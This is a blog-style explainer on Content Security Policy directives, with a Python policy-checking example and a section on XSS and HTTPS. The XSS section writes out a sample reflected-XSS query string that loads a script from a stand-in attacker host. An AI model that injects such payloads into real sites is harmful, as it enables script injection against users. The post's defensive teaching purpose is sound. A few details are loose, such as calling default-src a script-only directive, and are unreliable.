What is a Content Security Policy?
And why should you implement one on your website?

CSP is one of your first lines of defense against malicious actors on the internet. What a content security policy allows you to do, fundamentally, is to specify which addresses you want to allow your website to load scripts and other resources from. It looks something like this:
To set it you will either add the above line (configured to your liking) to the head section of every page on your website, or configure your server to send it as a response header for you. Visit the MDN Docs example section if you want to jump the gun and just get going right away, or read on to learn more about the why and the details.
Using a Content Security Policy:
You assemble the attributes of the CSP in the following format:
content="{sourceType} {restrictionRule}; {sourceType}{restrictionRule}; {sourceType} {restrictionRule}; etc..."
There are 5 sourceTypes in the CSP that you should be aware of. Each of them restricts the allowed sources of a specific file type to the rule that you provide. For example, if you only want to allow your website to request images from the current domain, then you can add img-src 'self' to your CSP. See the other important source locations below:
default-src (refers to scripts loaded on the site)
img-src
media-src
style-src
connect-src (refers to AJAX and other web APIs that send information requests across the internet)
Here is an example CSP using several of the sourceTypes above:
content="default-src 'self'; style-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com;"
How to set restriction rules for each content type:
The syntax for setting the specific restriction rules is varied and complex, allowing you to set any restrictionRule that you want for a specific sourceType. You can read through the syntax here.
What about Google Analytics?
Well, yes. Great catch. GA is one of the main external scripts that you will need to load on your website, and they are a fairly needy customer. They'll need you to include the following sources in these directives for GA to work properly (directive names are followed by a space, not a colon):
script-src https://www.google-analytics.com https://ssl.google-analytics.com
img-src https://www.google-analytics.com
connect-src https://www.google-analytics.com
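To make the format above and the Google Analytics directives concrete, here is an added example (not code from the original post) that parses a policy string and decides whether a given load would be permitted, applying the rule that a missing directive falls back to default-src. It is a simplified matcher: nonces, hashes, 'unsafe-inline' and port matching are deliberately out of scope, and the page origin and resource URLs are constructed test values. It also exposes a caveat the post glosses over: once you set script-src (for GA or anything else), default-src no longer applies to scripts, so your own scripts are blocked unless you add 'self' to script-src too.

```python
from urllib.parse import urlparse

def parse_csp(policy: str) -> dict:
    """Split "name src src; name src" into {directive: [source, ...]}."""
    directives = {}
    for part in policy.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def _origin(url: str) -> tuple:
    u = urlparse(url)
    return (u.scheme, u.hostname, u.port)

def _source_matches(source: str, url: str, page_origin: str) -> bool:
    """Simplified source matching: '*', 'self', 'none' and host sources.
    Other keyword sources (nonces, hashes, 'unsafe-inline') never match here."""
    if source == "*":
        return True
    if source == "'self'":
        return _origin(url) == _origin(page_origin)
    if source.startswith("'"):          # 'none' and unsupported keywords
        return False
    u = urlparse(url)
    if "://" in source:                 # scheme given: must match exactly
        scheme, host = source.split("://", 1)
        if u.scheme != scheme.lower():
            return False
    else:                               # no scheme: page's scheme, or https
        host = source
        if u.scheme not in (urlparse(page_origin).scheme, "https"):
            return False
    host = host.split("/", 1)[0].split(":", 1)[0].lower()  # drop path/port
    if host.startswith("*."):           # *.example.com matches subdomains only
        return (u.hostname or "").endswith(host[1:])
    return u.hostname == host

def is_allowed(policy: str, directive: str, url: str, page_origin: str) -> bool:
    """Would a resource governed by `directive` load from `url`? A missing
    directive falls back to default-src; with neither, the type is unrestricted."""
    directives = parse_csp(policy)
    sources = directives.get(directive, directives.get("default-src", ["*"]))
    return any(_source_matches(s, url, page_origin) for s in sources)

if __name__ == "__main__":  # the post's example policy, applied to two loads
    P = "default-src 'self'; style-src 'self'; img-src *; media-src media1.com media2.com; script-src userscripts.example.com;"
    for d, u in [("img-src", "https://cdn.other.net/a.png"), ("script-src", "https://example.com/app.js")]:
        print(d, u, is_allowed(P, d, u, "https://example.com"))
```

Running it shows the post's own example policy blocks a script served from the site itself, because script-src was set without 'self'.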
Why Content Security Policy?
Content Security Policy (CSP) helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks.
XSS (Cross Site Scripting)
A primary goal of CSP is to mitigate and report XSS attacks. XSS attacks exploit the browser's trust of the content received from the server. The most common XSS mode is reflected XSS, where a hacker sends a link that contains a query string with a script inside (www.example.com?searchTerm=<script src='www.hacker.ca'></script>). The server "reflects" that script, sending it back to the user's browser, which fetches and executes the script unknowingly. This tactic works because the browser trusts the source of the content, even when it's not coming from where it seems to be coming from. A CSP will catch this type of attack in most cases, by blocking that initial script from loading.
Packet Sniffing
In addition to restricting the domains from which content can be loaded, the server can specify which protocols are allowed to be used; for example (and ideally, from a security standpoint), a server can specify that all content must be loaded using HTTPS. HTTPS was created to prevent packet sniffing, whereby hackers intercept and decode data as it travels across the internet.
I hope that this brief overview of Content Security Policy is useful to some of you, thanks for reading!